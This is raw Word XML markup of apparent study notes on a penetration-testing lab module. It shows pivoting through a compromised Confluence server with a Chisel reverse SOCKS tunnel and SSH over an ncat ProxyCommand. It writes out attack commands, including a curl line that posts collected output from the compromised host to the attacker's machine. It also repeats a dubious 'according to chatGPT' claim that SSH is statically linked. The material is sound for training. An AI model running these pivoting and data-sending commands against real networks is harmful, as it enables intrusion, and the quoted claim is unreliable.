      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2273300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="547" name="image243.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image243.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1326"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -ntplu</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If you see that we are now listening on local host port 1080, that means our SOCKS proxy is listening now!</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If you don't see any Chisel server output, look at the "How to debug Chisel problems" section below to troubleshoot. If you see output and the port looks good, then you can proceed in this section.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A33">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's use this to connect to the SSH server on PGDATABASE01</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. In </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port Redirection and SSH Tunneling</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we created SOCKS proxy ports with both SSH remote and classic dynamic port forwarding and used Proxychains to push non-SOCKS-native tools through the tunnel. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But we've not yet actually run SSH itself through a SOCKS proxy. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="786"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">According to chatGPT, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">you can't even run SSH through proxychains if we wanted to</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> since SSH (/usr/bin/ssh) is a statically linked binary on Kali (and many other distros), or it may perform operations early in execution that bypass proxychains’ hooks. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Statically linked binary don't work on proxychains. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, you have to run SSH this way if you want it to run it through a SOCKS proxy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A35">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH doesn't offer a generic SOCKS proxy command-line option. Instead, it offers the</w:t>
      </w:r>
      <w:hyperlink r:id="rId214">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId215">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">ProxyCommand</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> configuration option. We can either write this into a configuration file, or pass it as part of the command line with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-o</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A36">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId216">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">ProxyCommand</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> accepts a shell command that is used to open a proxy-enabled channel. The documentation suggests using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OpenBSD</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> version of Netcat, which exposes the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-X</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag and can connect to a SOCKS or HTTP proxy. However, the version of Netcat that ships with Kali doesn't support proxying.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A37">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Instead, we'll use</w:t>
      </w:r>
      <w:hyperlink r:id="rId217">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId218">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Ncat</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, the Netcat alternative written by the maintainers of Nmap. We can install this on Kali with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt install ncat</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A38">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt install ncat</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Now we'll pass an Ncat command to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ProxyCommand</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. The command we construct tells Ncat to use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">socks5</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> protocol and the proxy socket at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1:1080</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">%h</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">%p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tokens represent the SSH command host and port values, which SSH will fill in before running the command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A3B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3454400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="280" name="image286.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image286.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="627"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -o ProxyCommand='ncat --proxy-type socks5 --proxy 127.0.0.1:1080 %h %p' database_admin@10.4.50.215</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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Very nice! We gained access to the SSH server, through our Chisel reverse SOCKS proxy, tunneling traffic through a reverse HTTP tunnel.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A3F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this Learning Unit, we created a reverse tunnel using Chisel, and then used this tunnel to log in to an SSH server on PGDATABASE01 within the internal network. We did this with only HTTP-formatted traffic to and from the compromised CONFLUENCE01 pivot server.</w:t>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_zbfxwknx216z" w:id="90"/>
      <w:bookmarkEnd w:id="90"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to debug Chisel problems</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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">However, nothing happens. We don't see any traffic hit our Tcpdump session, and the Chisel server output doesn't show any activity.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A45">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This indicates there may be something wrong with the way we're running the Chisel client process on CONFLUENCE01. However, we don't have direct access to the error output when running the binary. We need to figure out a way to read the command output, which may be able to point us towards the problem. We should then be able to solve it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A46">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To read the command output, we can construct a command which redirects stdout and stderr output to a file, and then send the contents of that file over HTTP back to our Kali machine. We use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> operator, which directs all streams to stdout, and write it to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/output</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. We then run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--data</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag, telling it to read the file at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/output</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and POST it back to our Kali machine on port 8080.</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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/chisel client 192.168.118.4:8080 R:socks &amp;&gt; /tmp/output; curl --data @/tmp/output http://192.168.118.4:8080/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A49">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="644"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We run this on CONFLUNCE01</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A4A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="644"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the error-collecting-and-sending command string.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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t xml:space="preserve">On sending this new command, we check Tcpdump output for attempted connections.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A4D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3556000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="319" name="image328.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image328.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22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t xml:space="preserve">We get the output that running </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/chisel</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> produces. Chisel is trying to use versions 2.32 and 2.34 of</w:t>
      </w:r>
      <w:hyperlink r:id="rId221">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId222">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">glibc</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which the CONFLUENCE01 server does not have.</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t xml:space="preserve">Note: This module was written in 2023, using Chisel version 1.8.1-0kali2 (go1.20.7). The Kali repos will likely contain later versions of Chisel in the future, and the exact error message that comes back from these later versions of Chisel may be different. However, the same principle applies. We have encountered an error trying to run a payload on a target system. As such, we must find an alternative payload which will run. Finding a way around these kinds of setbacks is an important skill which can be applied to many other situations where tool incompatibilities arise.This module was written in 2023, using Chisel version 1.8.1-0kali2 (go1.20.7). The Kali repos will likely contain later versions of Chisel in the future, and the exact error message that comes back from these later versions of Chisel may be different. However, the same principle applies. We have encountered an error trying to run a payload on a target system. As such, we must find an alternative payload which will run. Finding a way around these kinds of setbacks is an important skill which can be applied to many other situations where tool incompatibilities arise.</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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This points towards a version incompatibility. When a version of a tool or component is more recent than the operating system it's trying to run on, there's a risk that the operating system will not contain the required technologies that the newer tool is expecting to be able to use. In this case, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Chisel is expecting to use glibc version 2.32 or 2.34</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, neither of which can be found on CONFLUENCE01.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A55">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To try to find a solution, let's first check the version information for the Chisel binary we have on Kali, which we are also trying to run on CONFLUENCE01.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A56">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2654300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="229" name="image222.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image222.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="433"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chisel -h</w:t>
      </w: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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The version of Chisel that ships with this version of Kali is 1.8.1. However, there is another detail that's important here. It has been compiled with Go version 1.20.7.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A5A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Some light web surfing reveals:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A5B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="351"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
